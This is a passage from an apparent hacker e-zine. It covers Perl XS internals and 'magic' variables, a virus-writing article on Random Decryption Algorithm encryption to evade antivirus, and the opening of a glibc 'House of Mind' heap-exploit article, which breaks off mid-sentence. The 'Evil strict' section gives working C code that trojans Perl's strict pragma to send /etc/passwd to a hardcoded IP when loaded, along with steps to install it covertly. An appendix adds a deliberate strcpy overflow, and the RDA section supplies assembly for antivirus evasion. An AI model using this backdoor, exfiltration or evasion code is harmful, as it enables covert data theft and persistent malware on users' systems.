---[ 3.4 ]---------------------------------------------[ The Perl API ]-----


Now you know enough XS to know how to do things. Especially if you know C.
You know how to use that XS in your Perl program. And you have enough
knowledge of Perl datatypes to mess with them. You're all set! But wait, you
aren't. Here we have to have a little talk about the Perl API.

You might want to, for example, change an SV's data or something of that
sort. However, doing so manually, and properly, would require various checks
to find out just what kind of data it contains. You and I are likely to mess
that up. It's natural. Especially with a gross underestimation of the
complexity and variety of SV types. Thankfully, this work has been done for
us. The application has a very extensive API, a lot of it built up upon
various levels, to make things very easy for developers. There really is a
lot that needs to be done to make sure things work right. I personally might
bypass this in a lot of the code here, but I'm also mostly interested in
exploring and breaking. For serious work, the Perl API is perfect. I would
just like to detail some relevant functions.

You can create a new SV like this:

SV* scalar = newSV(0); // empty, allocated zero bytes
SV* scalar = newSV(100); // empty, 100 allocated bytes
SV* scalar = newSViv(100); // new IV (integer), with value 100
SV* scalar = newSVpv("happy", 5); // if you still need an explanation...

We can change current values similarly:

sv_setiv(scalar, 100);
sv_setpv(scalar, "happy");

We access the values as so:

SvIV(scalar);
SvNV(scalar); //etc

STRLEN len;
SvPV(scalar, len);

Please note that you provide a STRLEN type and SvPV will assign the length
of the string into it. Note that STRLEN == MEM_SIZE == Size_t. Here, better
example:

STRLEN length;
printf("My string is \"%s\" and its length is %d\n",
SvPV(scalar, length), length);

When it comes to reference counts, we can modify them like this:

SvREFCNT(scalar); // returns current value
SvREFCNT_inc(scalar); // increase by one
SvREFCNT_dec(scalar); // decrease by one

Notice that you are expected to alter reference counts in single increments
or decrements. Darn.

Something that hasn't come up here yet, but which is important once you
really get into XS, is the mortality of variables. Basically we don't want
to have the equivalent of a memory leak in a function, where we temporarily
use a variable but it's reference count doesn't expire due to odd
circumstances.

SV* scalar = sv_newmortal(); // create a new mortal variable
sv_2mortal(scalar); // mortalize an existing SV
SV* scalar = sv_mortalcopy(otherscalar); // Make a mortal copy of an
existing scalar

We have functions to manipulate type, as seen before.
SvIOK(scalar); // returns true if is IOK
SvIOK_on(scalar); // set the IOK (and pIOK) flag on
SvIOK_only(scalar); // set IOK (and pIOK) on and turn others off

That is about as far as I want to get into the API at the moment.



---[ 3.5 ]----------------------------------------------[ Evil strict ]-----


Time for some more fun. This really does not involve much Perl or Perl API.
We are going to make strict call home. strict is the common pragma that any
decent Perl program calls immediately. In this example case, we will get it
to connect, on our owned box, to somewhere special and dump /etc/passwd.
Naturally, you can insert DNS code if you want and send a file other than
/etc/passwd, presumably something useful. Imagine you have some sniffing
script running and you want to send out its latest data. Or something. We
are hiding malicious code in a loadable object that we will have called
whenever someone uses strict. It might not be the cleanest method, but it is
less noticable than a cron job or any number of other methods, and our evil
code is relatively hidden, in a .so. Of course we could just write the code
in Perl in strict.pm, but that would be more obvious.

This is our XS:

#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
#include "ppport.h"

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define DEST_IP "192.168.1.10"
#define DEST_PORT 1347

MODULE = strict PACKAGE = strict

BOOT:
int sockfd;
struct sockaddr_in dest_addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
memset(&(dest_addr.sin_zero), '\0', 8);
if( connect(sockfd, (struct sockaddr *)&dest_addr,
sizeof(struct sockaddr)) != -1 ) {
char s[100];
FILE* f;
f=fopen("/etc/passwd","r");
while (fgets(s, 100, f) != NULL) {
send(sockfd, s, strlen(s), 0);
}
close(sockfd);
}

The one odd thing you should notice is the BOOT tag. That is crucial. It is
how we execute code upon loading, and not just in functions. So, if that is
our XS, we need our strict.pm. You may notice that I do not do any error
reporting. Ask yourself, do I WANT to make this visible at all?

h2xs -A -n strict
cp xsfromz.xs strict/strict.xs
cd strict
perl Makefile.PL
make

And, make sure your version is 1.03, to match strict. And, if anything there
didn't work, fix it. Right. Now we copy our strict.so file to a proper auto
directory in @INC, Then, we need to modify the proper strict.pm to use our
code. Add your require lines at the top and include the @ISA line. Shortly
after the version do a "bootstrap strict;". There is one last thing you need
to change: strict.pm creates a @wrong array and dies if it ends up with any
members. Either comment out the "push @wrong" line, or the death block, or
change the condition. Whatever. Just note that if you don't, strict dies.
Yes, this will cause strict to inexpicably not fail when called incorrectly.
But when does that happen? And who will be curious and educated enough to
find out why? Blame DynaLoader.

So there you have it. Malicious code hidden behind the guise of our
friendly, non-evil strict.


-[ 4.0 ]------------------------------------------------------[ Magic ]-----


---[ 4.1 ]------------------------------------[ Introduction to Magic ]-----

Put your cards away rattle. I'm talking Perl magic. That's a technical term.
Why do we call it magic? Because it does magic, and it makes a lot possible.
Magic makes the impossible possible. It is how perl implements many special
variables, tied variables, internal features, and who knows what else. With
magic we can make something happen when a variable is called or when it is
changed. That's the gist of common use. When you get deep into mg.c, you
will notice it is implemented magically too.

For these various reasons, perl has an SV type called magic. PVMG. You may
recognize this as type 7 of our list. It is just like a PV, except it has
two more members. One of these is a pointer towards another structure, a
MAGIC structure.

================================================== Obscure Reference Note ==

The Perl function "tie" is the Perl 5 magic that makes OOP much more of a
feasible reality. Basically it ties a variable to a class. Getting this to
happen took a lot of internal mucking. But when it did, we could begin to
satisfy the OOP fanatics among us.

============================================================================

<Limbic_Region> ok, then you know that the people who grok that shit are
socially stunted, right

This is our magic structure, that xmg->magic points at.

struct magic {
MAGIC* mg_moremagic;
MGVTBL* mg_virtual; /* pointer to magic functions */
U16 mg_private;
char mg_type;
U8 mg_flags;
SV* mg_obj;
char* mg_ptr;
I32 mg_len;
};

The first item in the magic structure is a pointer towards another magic
structure, mg_moremagic. So yes, we have a potential linked list of magic
structures. When perl interprets a magic SV it goes through all of the
items. Have a very relevant example taken from mg.c

int
Perl_mg_set(pTHX_ SV *sv)
{
dVAR;
const I32 mgs_ix = SSNEW(sizeof(MGS));
MAGIC* mg;
MAGIC* nextmg;

save_magic(mgs_ix, sv);

for (mg = SvMAGIC(sv); mg; mg = nextmg) {
const MGVTBL* vtbl = mg->mg_virtual;
nextmg = mg->mg_moremagic; /* it may delete itself */
if (mg->mg_flags & MGf_GSKIP) {
mg->mg_flags &= ~MGf_GSKIP; /* setting requires another read */
(SSPTR(mgs_ix, MGS*))->mgs_flags = 0;
}
if (vtbl && vtbl->svt_set)
CALL_FPTR(vtbl->svt_set)(aTHX_ sv, mg);
}

restore_magic(INT2PTR(void*, (IV)mgs_ix));
return 0;
}

You know what's a nice feeling? Knowing what most of that does and how it
does it.

Let us continue. Magic has much more to its structure than just a pointer to
the next one. It has a structure called MGVTBL, where the real juice
happens. That's the magic virtual table. This contains five pointers to
routine types. The first two are svt_get and svt_set, which are called when
the variable is accessed and modified, respectively. The type of virtual
table you use is defined in the type field of the magic structure, and there
are a number of them. This is from perl.h:

#define PERL_MAGIC_sv '\0' /* Special scalar variable */
#define PERL_MAGIC_overload 'A' /* %OVERLOAD hash */
#define PERL_MAGIC_overload_elem 'a' /* %OVERLOAD hash element */
#define PERL_MAGIC_overload_table 'c' /* Holds overload table (AMT) on stash
*/

#define PERL_MAGIC_bm 'B' /* Boyer-Moore (fast string search) */
#define PERL_MAGIC_regdata 'D' /* Regex match position data
(@+ and @- vars) */

#define PERL_MAGIC_regdatum 'd' /* Regex match position data element
*/

#define PERL_MAGIC_env 'E' /* %ENV hash */
#define PERL_MAGIC_envelem 'e' /* %ENV hash element */
#define PERL_MAGIC_fm 'f' /* Formline ('compiled' format) */
#define PERL_MAGIC_regex_global 'g' /* m//g target / study()ed string */
#define PERL_MAGIC_hints 'H' /* %^H hash */
#define PERL_MAGIC_hintselem 'h' /* %^H hash element */
#define PERL_MAGIC_isa 'I' /* @ISA array */
#define PERL_MAGIC_isaelem 'i' /* @ISA array element */
#define PERL_MAGIC_nkeys 'k' /* scalar(keys()) lvalue */
#define PERL_MAGIC_dbfile 'L' /* Debugger %_<filename */
#define PERL_MAGIC_dbline 'l' /* Debugger %_<filename element */
#define PERL_MAGIC_mutex 'm' /* for lock op */
#define PERL_MAGIC_shared 'N' /* Shared between threads */
#define PERL_MAGIC_shared_scalar 'n' /* Shared between threads */
#define PERL_MAGIC_collxfrm 'o' /* Locale transformation */
#define PERL_MAGIC_tied 'P' /* Tied array or hash */
#define PERL_MAGIC_tiedelem 'p' /* Tied array or hash element */
#define PERL_MAGIC_tiedscalar 'q' /* Tied scalar or handle */
#define PERL_MAGIC_qr 'r' /* precompiled qr// regex */
#define PERL_MAGIC_sig 'S' /* %SIG hash */
#define PERL_MAGIC_sigelem 's' /* %SIG hash element */
#define PERL_MAGIC_taint 't' /* Taintedness */
#define PERL_MAGIC_uvar 'U' /* Available for use by extensions */
#define PERL_MAGIC_uvar_elem 'u' /* Reserved for use by extensions */
#define PERL_MAGIC_vec 'v' /* vec() lvalue */
#define PERL_MAGIC_vstring 'V' /* SV was vstring literal */
#define PERL_MAGIC_utf8 'w' /* Cached UTF-8 information */
#define PERL_MAGIC_substr 'x' /* substr() lvalue */
#define PERL_MAGIC_defelem 'y' /* Shadow "foreach" iterator variable
/
smart parameter vivification */

#define PERL_MAGIC_arylen '#' /* Array length ($#ary) */
#define PERL_MAGIC_pos '.' /* pos() lvalue */
#define PERL_MAGIC_backref '<' /* for weak ref data */
#define PERL_MAGIC_symtab ':' /* extra data for symbol tables */
#define PERL_MAGIC_rhash '%' /* extra data for restricted hashes */
#define PERL_MAGIC_arylen_p '@' /* to move arylen out of XPVAV */
#define PERL_MAGIC_ext '~' /* Available for use by extensions */

How perl will react to a type of magic is usually predefined. Trying to make
magic in almost any of those forms is a suicidal idea. But just in case you
want to, here's how:

SV* scalar = newSV(0);
sv_magic(scalar, scalar, PERL_MAGIC_arylen, "whatever", 8);
// arylen, I bet that will break nicely
sv_magic(scalar, 0, 'S', ".", 1); // all is well

You know what's fun? You can select meaningless dribble for the second,
third, fourth, and fifth arguments, and it won't usually break right away.
How any of those are used is magic. MAGIC. Really. Random stuff in mg.c and
elsewhere will do checks for certain types. Like "if this happens to be
magic, and happens to be this certain type of magic, with this certain flag,
we're going to GET JIGGY WITH IT"
.

The actual definition of sv_magic is this:

void sv_magic(SV* sv, SV* obj, int how, const char* name, I32 namlen);

The first argument is the SV we are magicizing, the second ends up in that
obj field of the magic struct, the third is the type as defined in that
massive paste above (put PERL_MAGIC_ext or '~', your choice), the fourth is
a name associated with it which ends up in the ptr field, and the fifth is
the length of that. Phew!

This is a function that just makes a variable magic, as you prescribe:

SV*
sv_make_magic(scalar, type, ident="happy")
SV* scalar
char type
char* ident
CODE:
sv_magic(scalar, scalar, type, ident, strlen(ident));

Notice in this example I first demonstrate default parameters, so the user
doesn't necessarily have to provide a name section if it isn't relevant. XS
is full of such neat goodies.

If you want to remove magic from a variable, you can use sv_unmagic(scalar,
type);

I am sure that by now you are superbly confused. Don't worry, that's normal.
I've explained magic like a maniac on meth. Also, the concept isn't nearly
as concrete as others, such as SVs on their own, or IVs, etcetera.

The type of magic used most often is PERL_MAGIC_sv, or '\0'. Most Perl
special variables are this type. In this case, that name paramater
generating it is its actual variable name. For $\ we give "\".



---[ 4.2 ]-------------------------------[ Changing Special Variables ]-----


<fish> cool. You likely shouldn't do that

Maybe like me you decided to be a very naughty boy. You want to change the
magic of how a special variable operates. And you don't want to dig through
all of perl's source code changing things. So, let us just remake it and
overwrite the svt_get or svt_set pointer. Oh yeah.

SV *
sv_change_magic(scalar)
SV* scalar
CODE:
MGVTBL * const vtbl = ((struct xpvmg*)
SvANY(scalar))->xmg_magic->mg_virtual;
(void*)vtbl->svt_get = my_fun;

Aren't I nice, spreading that out into a full TWO lines of sweet structure
madness? In case you were wondering, SvANY is this:

#define Sv_ANY(sv) (sv)->sv_any

Just sometimes makes it easier or more legible to write.

Here is the catch: we have to point that at something, and that something
already has to exist. So we write a my_fun before the XS in our .xs file.
This function should match the following:

I32 my_fun( pTHX_ IV num, SV* scalar);

That might not make sense to you, but that's ok. The first argument type is
IV, pTHX_ is merely a perl macro that will make sure our function works
whether or not we are using threads. Any perl variable that has a character,
then THX, then maybe an underscore (maybe not!) is a thread variable. Things
in perl work a bit differently depending on if you are using threads or not,
but thankfully perl provides this mechanism to make sure it usually doesn't
matter to us.

Here is an example function:

I32
my_fun( pTHX_ IV foo, SV* scalar)
{ printf( "ZSHZN IS KING\n"); }

Now allow me to demonstrate:

use ExtUtils::testlib;
use Flag;
Flag::sv_change_magic($<);
$<++;
$<++;

bash-3.00$ make && perl flag.pl
ZSHZN IS KING
ZSHZN IS KING
bash-3.00$

You get the idea. You can now do whatever you want to Perl special
variables: just be warned that they will lose their original behavior that
was there for a reason. I am not sure when you would actually have a
practical use for creating your own special behavior for variables that perl
specifically needs in one context or another. Unless, of course, you want
everyone to know of your favourable impression of zshzn.



---[ 4.3 ]---------------------------------------------[ Our Own Magic ]----


<Limbic_Region> zshzn - I am not an internals weenie
<zshzn> Limbic_Region: out of curiosity, is there a specific place where the
internals weenies hang out, where they would all jump up and joyfully assist
me in my curious wanderings?
<Limbic_Region> the internals weenies I know of don't really do IRC

It turns out perl provides a system for creating your own magic variables.
So you don't start randomly magicizing variables in ways that will cause
perl to treat them like something important. Maybe you noticed it already.

#define PERL_MAGIC_uvar 'U' /* Available for use by extensions */

We use a ufuncs structure, as defined in perl.h, and the address of that is
our fourth argument to sv_magic. Yes, I know that is insane. But this is
magic. This is actually very easy to use, considering what we have already
discovered above.

SV*
sv_set_magic(scalar)
SV* scalar
CODE:
struct ufuncs uf;
uf.uf_val = &my_fun;// access, svt_get
uf.uf_set = &my_fun; // set, svt_set
uf.uf_index = 0; // identification index
sv_magic(scalar, 0, PERL_MAGIC_uvar, (char*)&uf, sizeof(uf));

Remember from above the signature, I32 my_fun( pTHX_ IV num, SV* scalar);,
that we are calling first with an IV, and secondly with a SV. Your function
can parse the identification number and act accordingly, if you need to
treat different callers differently.



---[ 4.4 ]---------------------------------------------[ A Magic JAPH ]-----


Here is a practical example of our ability at work.

bash-3.00$ cat flag.pl

$|=1;
print "Generating obfuscation...";
Flag::sv_set_magic($$_=$_) for
qw / J u s t a n o t h e r P e r l h a c k e r /;
Flag::flush();
1-$J-$u-$s-$t;
Flag::space();
1-$a-$n-$o-$t-$h-$e-$r;
Flag::space();
1-$P-$e-$r-$l;
Flag::space();
1-$h-$a-$c-$k-$e-$r;
Flag::flush();
bash-3.00$ perl flag.pl
Generating Obfuscation...terhaer
Just another Perl hacker
bash-3.00$

I will leave it as a challenge to the reader as to how that works, why it
doesn't work better, and what limitations it has on it.



-[ 5.0 ]----------------------------------------------------[ Closing ]-----


---[ 5.1 ]----------------------------------------------[ More Topics ]-----


I fully intended to go into more advanced topics. Topics such as the Perl
stack, interaction between stacks, using Perl outside of perl itself,
hacking perl itself, interaction between Perl subroutines, and more.
However, I decided that I better not. The existing documents on those
subjects are very good. After a certain level of familiarity, all you need
to do more things is our handy Perl documentation.


---[ 5.2 ]--------------------------------------------------[ Sources ]-----


The first and foremost among sources is perlguts. There is also illguts
(Perlguts Illustrated, to be found online), perlxs, perlxstut, perlembed,
perlcall, perlapi, perlhack (An excellent document, the specific reason why
this article cannot be named "Hacking Perl"), perlclib, and perlintern. In
my research I have also spent a bit of time on IRC, with some few people who
can offer relevant assistance. I have also spent a lot of time going through
perl source code. I find this particular document relelvant because it
covers such a variety in a short space, and also brings up security issues
and other fun that anybody can enjoy.


---[ 5.3 ]---------------------------------------------------[ Shouts ]-----


I would like to thank fishbot, Limbic~Region, and AtnNn, all of whom helped
in one way or another.




-[ 6.0 ]------------------------------------------[ Appendix: Flag.xs ]-----


#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
#include <math.h>
#define DEBUG 0

I32
my_fun( pTHX_ IV foo, SV* scalar)
{ printf( "%c", foo); }

MODULE = Flag PACKAGE = Flag

/* Ever just wished that Perl was an archaic language and you could actually
find such issues as buffer overflows in source code, leading to mad
exploitation for all? Well, if you could, you might find it challenging and
unique, compared to C. This function exists so that you can play around. */


SV *
sv_evil(scalar, string)
SV* scalar
char* string
CODE:
strcpy(((struct xpv*)scalar->sv_any)->xpv_pv,string);

SV *
sv_change_magic(scalar)
SV* scalar
CODE:
MGVTBL * const vtbl = ((struct xpvmg*)
SvANY(scalar))->xmg_magic->mg_virtual;
(void*)vtbl->svt_get = my_fun;

SV*
sv_set_magic(scalar)
SV* scalar
PREINIT:
struct ufuncs uf;
CODE:
uf.uf_val = &my_fun;
uf.uf_set = 0;
int len;
char *temp = SvPV(scalar, len);
uf.uf_index = temp[0];
sv_magic(scalar, scalar, PERL_MAGIC_uvar, (char*)&uf, sizeof(uf));

void flush()
CODE:
printf("\n");

void space()
CODE:
printf(" ");

SV*
sv_do_magic(scalar)
SV* scalar
CODE:
sv_magic(scalar,scalar, '\0', "happy", 5);
const MGVTBL * const vtbl = ((struct xpvmg*)
SvANY(scalar))->xmg_magic->mg_virtual;
MAGIC* mg = ((struct xpvmg*) SvANY(scalar))->xmg_magic;
CALL_FPTR(vtbl->svt_get)(scalar, mg);

SV*
sv_make_magic(scalar, type, ident="happy")
SV* scalar
char type
char* ident
CODE:
sv_magic(scalar, scalar, type, ident, strlen(ident));

SV *
sv_break_undef()
CODE:
SV* temp = newSVpv("happy", 5);
temp->sv_refcnt = ((SV*)&PL_sv_undef)->sv_refcnt;
PL_sv_undef = *temp;

SV *
sv_set_type(scalar, type)
SV* scalar
char* type
CODE:
char types[16][9] = {
"SVt_NULL", "SVt_IV",
"SVt_NV", "SVt_RV",
"SVt_PV", "SVt_PVIV",
"SVt_PVNV", "SVt_PVMG",
"SVt_PVBM", "SVt_PVLV",
"SVt_PVAV", "SVt_PVHV",
"SVt_PVCV", "SVt_PVGV",
"SVt_PVFM", "SVt_PVIO"
};
scalar->sv_flags >>= 4;
scalar->sv_flags <<= 4;
int i;
for (i = 0; i < 16; i++) {
if ( strEQ(type, types[i]) ) {
scalar->sv_flags |= i;
break;
}
}

SV *
sv_set_flag(scalar, flag)
SV* scalar
char* flag
CODE:

char flags[24][10] = {
"PADBUSY", "PADTMP",
"PADMY", "TEMP",
"OBJECT", "GMAGICAL",
"SMAGICAL", "RMAGICAL",
"IOK", "NOK",
"POK", "ROK",
"FAKE", "OOK",
"BREAK", "READONLY",
"IOKp", "NOKp",
"POKp", "SCREAM",
"AMAGIC", "SHAREKEYS",
"LAZYDEL", "VALID"
};
int i;
for (i = 0; i < 24; i++) {
if ( strEQ(flag, flags[i]) ) {
scalar->sv_flags |= (int)pow(2,i+8);
break;
}
}
if ( DEBUG ) {
printf("[ %u ]\n",scalar->sv_flags );
Perl_sv_dump(scalar);
}

SV *
sv_set_flag_only(scalar, flag)
SV* scalar
char* flag
CODE:

char flags[24][10] = {
"PADBUSY", "PADTMP",
"PADMY", "TEMP",
"OBJECT", "GMAGICAL",
"SMAGICAL", "RMAGICAL",
"IOK", "NOK",
"POK", "ROK",
"FAKE", "OOK",
"BREAK", "READONLY",
"IOKp", "NOKp",
"POKp", "SCREAM",
"AMAGIC", "SHAREKEYS",
"LAZYDEL", "VALID"
};
int i;
for (i = 0; i < 24; i++) {
if ( strEQ(flag, flags[i]) ) {
scalar->sv_flags = (int)pow(2,i+8);
break;
}
}
if ( DEBUG ) {
printf("[ %u ]\n",scalar->sv_flags );
Perl_sv_dump(scalar);
}

SV *
sv_rm_flag(scalar, flag)
SV* scalar
char* flag
CODE:

char flags[24][10] = {
"PADBUSY", "PADTMP",
"PADMY", "TEMP",
"OBJECT", "GMAGICAL",
"SMAGICAL", "RMAGICAL",
"IOK", "NOK",
"POK", "ROK",
"FAKE", "OOK",
"BREAK", "READONLY",
"IOKp", "NOKp",
"POKp", "SCREAM",
"AMAGIC", "SHAREKEYS",
"LAZYDEL", "VALID"
};
int i, j;
for (i = 0; i < 24; i++) {
if ( strEQ(flag, flags[i]) ) {
j |= (int)pow(2,i+8);
j = ~j;
scalar->sv_flags &= j;
break;
}
}
if ( DEBUG ) {
printf("[ %u ]\n",scalar->sv_flags );
Perl_sv_dump(scalar);
}

SV *
sv_copy(src, dest)
SV* src
SV* dest
CODE:
sv_setsv(dest, src);
dest->sv_refcnt = src->sv_refcnt;
dest->sv_flags = src->sv_flags;
if ( DEBUG ) Perl_sv_dump(dest);

SV *
sv_my_clear(scalar)
SV* scalar
CODE:
// almost the same as the API's: sv_clear(scalar) or sv_free
sv_setiv(scalar, 0);
sv_setnv(scalar, 0);
sv_setpv(scalar, "");
scalar->sv_flags = 0;



SV*
int_me(SV* scalar)
CODE:
SvIOK_only(scalar);

SV *
stringify(SV* scalar)
CODE:
SvPOK_only(scalar);

SV *
double_or_nothing(SV* scalar)
CODE:
SvNOK_only(scalar);

SV*
play_test()
CODE:
ENTER;
PUSHMARK(SP);
mXPUSHp("yea",3); // == XPUSHs(sv_2mortal(newSVpv("yea",3)));
mXPUSHi(45);
PUTBACK;
int scalar;
scalar = call_pv("check", G_ARRAY);
SPAGAIN;
printf("yo: %d\n", scalar);
printf("yo: %d\n", POPi);
printf("yo: %d\n", POPi);
printf("yo: %d\n", POPi);
FREETMPS;
LEAVE;


----------------------------------[ EOF ]-----------------------------------

[=========================================================================]
[----------------------------[ Exploring RDA ]----------------------------]
[=========================================================================]


_==####==_
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/?_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########*?*######
*#########{ }####*
##########._.##### "Kill! Maim! Kill! Maim! Burn!"
################ ./kharn
*############*
?==####==?



--[ 0 ]-----------------------------------------------[ Introduction ]-----

The ultimate aim of every VXer is to write a program which is difficult,
or even impossible to remove from the host after it's been attached.
This code is then truly viral - it can't be removed without somehow
harming the host, or the host's environment. Many methods have been
used to achieve this, but at the heart of them all lies various methods
of encryption - and RDA is one of them.

RDA is not some new cipher - it stands for Random Decryption Algorithm,
and can be used with any encryption algorithm, whether symmetric or
assymetric. It was first implemented in the RDA.Fighter virus, a virus
which tried different decryption keys against itself until the
"decrypted" virus matched a certain checksum - and this was assumed to
be correct. This is the simplest implementation of RDA.


--[ 1 ]-----------------------------------------------[ Standard RDA ]-----

Your standard appending virus with encryption, encrypts the body and
stores the decryption algorithm, key, and ciphertext within the last
section of the host executable. When the executable is loaded,
AddressOfEntryPoint has already been hijacked, and points to your
decryption routine first. The ciphercode is decrypted, executed, and
control is hopefully returned to the host executable without any major
hitches.

The weakness of this is that an AV engine, upon recognizing your
decryption algorithm, will also recognize your decryption key. Simply
layering encryption on doesn't help either - the AV engine will simply
peel away the encryption layers, leading to your decrypted code.

RDA solves this problem by throwing away the decryption key, but
leaving the algorithm in the open - if the encryption is immune to
known-plaintext attacks[1], then the only way an Anti-Virus can look at
the plaintext code is by brute force. However, the only way YOU can
reach your own decrypted code is also by brute force. Thus, the
advantage lies with the virus - the virus can "tolerate" one or two
executables on a system being corrupted with incorrect decryption, an
anti-virus cannot.

The standard RDA implementation (weak XOR, for example):

setup:
xor ebx,ebx

iterate:
mov esi,[ebp + hostOffset]
mov edi,esi
mov ecx,[ebp + host_size]
inc ebx
decrypt:
lodsb
xor al,bl
stosb
loop decrypt

check:
mov esi,[ebp + hostOffset]
push esi
mov ecx,[ebp + host_size]
push ecx
mov eax,[ebp + __ADDR_CheckSum] ; whatever this happens to be
call eax
test eax,eax
jnz iterate
mov esi,[ebp + hostOffset]
jmp esi


However, this has major flaws which impede it's usability. For example,
if an anti-virus engine can see this code in the clear and recognizes
it, it can emulate the virus decryption engine, and call CheckSum for
itself - revealing the decrypted executable. Also, since the XOR
algorithm is weak, if a single byte is known in the plaintext, the
entire ciphertext becomes decrypted.

1) known plaintext attack: where a hostile entity knows part of, or the
entirety of your plaintext, and uses it to manipulate your encryption.
for example, bytewise XOR is weak to known plaintext attack - if I
know one character of the plaintext, i know the entire plaintext,
because the key is the same.


--[ 2 ]-----------------------------------[ Variation: SEH-based RDA ]-----

With the introduction of structured exception handling in Windows OSes,
programmers have a good way of catching unexpected errors and handling
them gracefully, instead of leading the user to a BSoD. This is also
good for when implementing RDA-based techniques: instead of matching the
decrypted code to a checksum, we simply run the decrypted code - and use
a different decryption key if we get an exception.

Probability is most certainly on our side here - the chance that we'll
get an incorrect decryption key leading to code which executes, but does
not lead to an exception, is negligible. Also, the circumstances tilt
the playing field towards the virus end - as a virus, it can "tolerate"
a few corrupted executables on a system due to incorrect decryption. An
anti-virus, on the other hand, cannot. Exception handling is set up with
the help of SetUnhandledExceptionFilter API, which is called as thus:

SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER f);

where 'f' is a function (the exception handler) defined as thus:

LONG f(STRUCT_EXCEPTION_POINTERS e);

f is called every time an exception occurs, and is passed the state of
the machine at the point of exception, in the Context member of e.
Basically, we just try different decryption keys - and if the end result
(the plaintext code) is incorrect, it'll most likely throw an exception,
and we can try a different key.

Here's the Context member of e, which we're interested in. This may
differ from machine to machine, and this was taken from an IA32 box.

CONTEXT STRUCT
ContextFlags DWORD ?
iDr0 DWORD ?
...
regEbp DWORD ?
regEip DWORD ?
regCs DWORD ?
regFlag DWORD ?
regEsp DWORD ?
regSs DWORD ?
ExtendedRegisters db MAXIMUM_SUPPORTED_EXTENSION dup(?)
CONTEXT ENDS

Basically, Context stores the state of the registers at the moment of
exception. When we exit from our exception handler, we have the option
of asking the CPU to return to execution from where it halted. This
"return point" is taken from regEIP, in the Context structure. So we
modify regEIP to point to our decryption algorithm again. We also need
to reset EBP and ESP, to make sure we can still access local variables
and whatnot when we return to the decryption algorithm.

pop eax
assume eax:ptr EXCEPTION_POINTERS
mov ebx,[eax].ContextRecord
mov eax,ebx
assume eax:ptr CONTEXT

; reset EIP, so we return to "decrypt:"
lea ebx,decrypt
mov [eax].regEip,ebx

mov ebx,ebpSafe
mov [eax].regEbp,ebx
mov ebx,espSafe
mov [eax].regEsp,ebx

mov eax,-1
ret

NOTE: ebpSafe and espSafe are drawn from values we know (assume) to be
correct - since there is an initial run of the decryption algorithm
(what if the key happens to be the first one guessed?) - ebp and esp are
saved at every iteration of the decryption algorithm. That way, they
remain static:

decrypt:
mov [ebp+espSafe],esp
mov [ebp+ebpSafe],ebp

There are problems with this method, however. Firstly, we must make
sure to recalculate EBP, especially if we work within the confines of a
virus. This must be done within the exception handler itself - if
"corrupted" or incorrectly decrypted code modifies EBP before throwing
an exception and you keep on using the tainted EBP, you'll throw more
exceptions, leading to an infinite loop and Windows terminating your
process.

Also, the encryption algorithm must be simple, and efficient - as a
virus, you must preserve a reasonable loading time for the host
executable. something which will take several minutes to brute force
is unacceptable - thus the XOR cipher. However, other fast ciphers
exist - for example, the XTEA cipher[2].

2) XTEA cipher: although reasonably fast in it's standard form, using
a 32-bit key is certainly too long for our brute forcing attempts -
we don't have time to cover that much keyspace. We can shorten XTEA
to only use 8 bits of randomness in a 32-bit key, to reduce our
brute forcing time.


----------------------------------[ EOF ]----------------------------------

[===========================================================================]
[---------------------------[ The House of Mind ]---------------------------]
[===========================================================================]


_==####==_
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/?_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########*?*######
*#########{ }####*
##########._.##### date: 01/01/2007
################ by: K-sPecial
*############*
?==####==?



[===========================================================================]


In 2004, a series of patches where released against the GLibC lines, adding
into effect mandatory assertions - in hope of slowing down, if not stopping
the exploitation of wild malloc()/free() holes (from here on out referred to
as "free holes"). In late 2005, Phantasmal Phantasmagoria released a paper
giving a detailed explanation of fresh, independantly discovered methods for
working around these assertions, and hence, making free holes fair game once
again. The only problem is: Phantasmal did not release any sourcecode with
his paper, which, at that time, was considered to be almost purely
theoretical. In this article, I will pick apart one of his methods,
explaining how it works and elaborate prerequisites for it to work at all.
For this purpose, I will choose what Phantasmal proclaims to be "the most
general technique"
- that is, which he also proclaims, the technique most
like the familiar unlink() method. It is now that I bring to you,

The House of Mind.

It should be noted that if one chooses to read this article, he shall be best

off with first consulting Phantasmal's explanation and version of The House
of Mind, which you can saftely find on both .aware and xzziroz with the link
provided lateron.

The idea behind the House Of Mind is that there is a structure for every
given heap "arena" that stores primary information regarding this "arena". An
arena consists of multiple heap "chunks" (blocks) in a given memory region. A
process starts itself with a primary arena named "main_arena". Assuming I
allocated the first chunk:


char *ptr = malloc(1024)


This chunk is contained in the main arena. There happens to be a flag in every

chunk, indicating whether the chunk pertains to the main arena. This flag is
located in the 'size' element of this structure:


chunk +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of previous chunk, if allocated | |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of chunk, in bytes M|M|P|
mem +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| User data starts here... .
. .
. (malloc_usable_space() bytes) .
. |
nextchunk +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Size of chunk |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


Taken from malloc.c, this flag is named NON_MAIN_ARENA:

#define NON_MAIN_ARENA 0x4

When calling the function public_free() (which is what free() boils down to)
with this flag set, the arena for the chunk which free() is being called for
will be pinpointed outside the main arena. The following code from malloc.c,
within public_free(), specificly outlines this process:

ar_ptr = arena_for_chunk(p);

Where p is the address of the chunk and ar_ptr is the container receiving the

address of this chunks arena. Defined in arena.c, the arena_for_chunk macro
